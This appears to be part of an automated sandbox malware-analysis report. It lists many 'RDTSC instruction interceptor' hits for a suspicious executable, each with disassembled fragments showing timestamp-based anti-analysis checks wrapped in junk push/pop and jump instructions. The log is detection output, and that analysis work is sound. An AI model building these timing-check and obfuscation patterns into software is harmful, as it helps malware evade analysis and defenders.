              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: AF19A8 second address: AF19C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jnl 00007FD84520DEE6h 0x0000000c popad 0x0000000d jmp 00007FD84520DEECh 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push eax 0x00000015 push ebx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: AF24EB second address: AF24EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: AF24EF second address: AF24F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: AF5EAF second address: AF5EB3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: AF5EB3 second address: AF5ECF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD84520DEF6h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: AF5ECF second address: AF5ED5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: AF5ED5 second address: AF5ED9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: A90A50 second address: A90A64 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FD845024956h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edi 0x0000000b jl 00007FD845024960h 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: AF9236 second address: AF923C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: AF923C second address: AF927F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 jmp 00007FD84502495Ch 0x0000000c pop ebx 0x0000000d jmp 00007FD845024962h 0x00000012 popad 0x00000013 pushad 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 jmp 00007FD84502495Eh 0x0000001c pop edx 0x0000001d pushad 0x0000001e jbe 00007FD845024956h 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: AF927F second address: AF9287 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: AF9287 second address: AF929A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 jmp 00007FD84502495Bh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: AFE45A second address: AFE45F instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: B03A6C second address: B03AAA instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007FD84502495Eh 0x00000008 pushad 0x00000009 popad 0x0000000a pop esi 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jnl 00007FD84502496Dh 0x00000015 pushad 0x00000016 jo 00007FD845024956h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: B03AAA second address: B03AB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FD84520DEE6h 0x0000000a popad 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: B0407B second address: B0407F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: B0407F second address: B04091 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FD84520DEE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jnc 00007FD84520DEE6h 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: B047F0 second address: B047FE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 pop eax 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: B04992 second address: B04998 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: B0C112 second address: B0C123 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FD845024956h 0x0000000a jo 00007FD845024956h 0x00000010 popad 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: B1040A second address: B10414 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FD84520DEECh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: ADA087 second address: ADA08C instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: ADA08C second address: ADA0E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push eax 0x0000000d call 00007FD84520DEE8h 0x00000012 pop eax 0x00000013 mov dword ptr [esp+04h], eax 0x00000017 add dword ptr [esp+04h], 00000015h 0x0000001f inc eax 0x00000020 push eax 0x00000021 ret 0x00000022 pop eax 0x00000023 ret 0x00000024 mov dx, ax 0x00000027 call 00007FD84520DEF0h 0x0000002c adc dx, E3A1h 0x00000031 pop ecx 0x00000032 lea eax, dword ptr [ebp+12484E1Fh] 0x00000038 mov di, 8771h 0x0000003c push eax 0x0000003d push eax 0x0000003e push edx 0x0000003f jp 00007FD84520DEE8h 0x00000045 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: ADA0E1 second address: ADA0E6 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: ADA0E6 second address: ABC0BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a clc 0x0000000b call dword ptr [ebp+122D2050h] 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 jg 00007FD84520DEE6h 0x0000001a jl 00007FD84520DEE6h 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: ADA1BC second address: ADA1C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: ADA1C0 second address: ADA1D4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD84520DEEDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: ADA294 second address: ADA298 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: ADA298 second address: ADA2BB instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a je 00007FD84520DEF9h 0x00000010 jmp 00007FD84520DEF3h 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: ADA2BB second address: ADA2C0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: ADA55A second address: ADA55E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: ADA55E second address: ADA564 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: ADA68D second address: ADA6A8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD84520DEF4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: ADA8FB second address: ADA8FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: ADA8FF second address: ADA953 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 jg 00007FD84520DEE8h 0x0000000e pushad 0x0000000f popad 0x00000010 jmp 00007FD84520DEF0h 0x00000015 popad 0x00000016 xchg eax, esi 0x00000017 push 00000000h 0x00000019 push eax 0x0000001a call 00007FD84520DEE8h 0x0000001f pop eax 0x00000020 mov dword ptr [esp+04h], eax 0x00000024 add dword ptr [esp+04h], 0000001Bh 0x0000002c inc eax 0x0000002d push eax 0x0000002e ret 0x0000002f pop eax 0x00000030 ret 0x00000031 or cx, 5EC6h 0x00000036 nop 0x00000037 push ecx 0x00000038 js 00007FD84520DEECh 0x0000003e push eax 0x0000003f push edx 0x00000040 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: ADA953 second address: ADA95E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: ADA95E second address: ADA962 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: ADB334 second address: ADB348 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop eax 0x00000006 mov dword ptr [esp+04h], eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jbe 00007FD845024958h 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: ADB348 second address: ADB34E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: ADB485 second address: ADB492 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: ADB492 second address: ADB496 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: ADB496 second address: ADB49A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: ADB49A second address: ABCBEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FD84520DEF2h 0x0000000b popad 0x0000000c nop 0x0000000d mov cx, 8F6Eh 0x00000011 call dword ptr [ebp+122D388Fh] 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a push esi 0x0000001b pop esi 0x0000001c je 00007FD84520DEE6h 0x00000022 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: B10849 second address: B10894 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD845024962h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FD845024969h 0x00000011 pushad 0x00000012 push esi 0x00000013 pop esi 0x00000014 jmp 00007FD845024965h 0x00000019 popad 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: B10CC3 second address: B10CD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop ebx 0x00000007 popad 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: B10CD0 second address: B10CD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: B10E93 second address: B10E9F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007FD84520DEE6h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: B10E9F second address: B10EA3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: B11128 second address: B1113A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a jno 00007FD84520DEE6h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: B1113A second address: B1113E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: B1113E second address: B11151 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD84520DEEFh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: B11151 second address: B11157 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: B1E565 second address: B1E584 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD84520DEF9h 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: B1E584 second address: B1E590 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edx 0x0000000b pop edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: B1E590 second address: B1E594 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: B1D0E7 second address: B1D0F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 jno 00007FD845024956h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: B1D0F6 second address: B1D0FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: B1D0FA second address: B1D111 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD84502495Dh 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: B1D111 second address: B1D12B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD84520DEF6h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: B1D3D0 second address: B1D3D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: B1D3D4 second address: B1D3E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FD84520DEE6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: B1D546 second address: B1D54A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: B1DC4F second address: B1DC55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: B1E402 second address: B1E407 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: B1E407 second address: B1E40C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: B21384 second address: B2138E instructions: 0x00000000 rdtsc 0x00000002 ja 00007FD845024956h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: B21505 second address: B2150B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: B2150B second address: B21510 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: B21673 second address: B2167C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: B2167C second address: B21682 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: B21801 second address: B21805 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: B23F97 second address: B23FA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: B23FA0 second address: B23FBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 jno 00007FD84520DEE6h 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f jmp 00007FD84520DEEBh 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: B2768C second address: B27699 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b push edi 0x0000000c pop edi 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: B27699 second address: B2769D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: B2769D second address: B276A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: B27817 second address: B2781D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: B2781D second address: B2782C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD84502495Bh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: B2782C second address: B27832 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: B27832 second address: B2785E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD84502495Eh 0x00000007 jmp 00007FD845024960h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push edx 0x00000011 push eax 0x00000012 pop eax 0x00000013 pop edx 0x00000014 push eax 0x00000015 push edx 0x00000016 pop edx 0x00000017 pop eax 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: B2785E second address: B27868 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007FD84520DEE6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: B279D7 second address: B27A0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FD845024965h 0x0000000b popad 0x0000000c pop esi 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 jmp 00007FD845024960h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: B27A0B second address: B27A15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: B27A15 second address: B27A20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FD845024956h 0x0000000a popad 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: B2C246 second address: B2C24F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push edx 0x00000008 pop edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: B2C24F second address: B2C255 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: B2B628 second address: B2B62E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: B2B62E second address: B2B634 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: B2B8FA second address: B2B927 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jmp 00007FD84520DEF5h 0x0000000a jo 00007FD84520DEE8h 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 jc 00007FD84520DEF2h 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: B2B927 second address: B2B92D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: B2B92D second address: B2B939 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jl 00007FD84520DEE6h 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: B2B939 second address: B2B93F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: B2B93F second address: B2B944 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
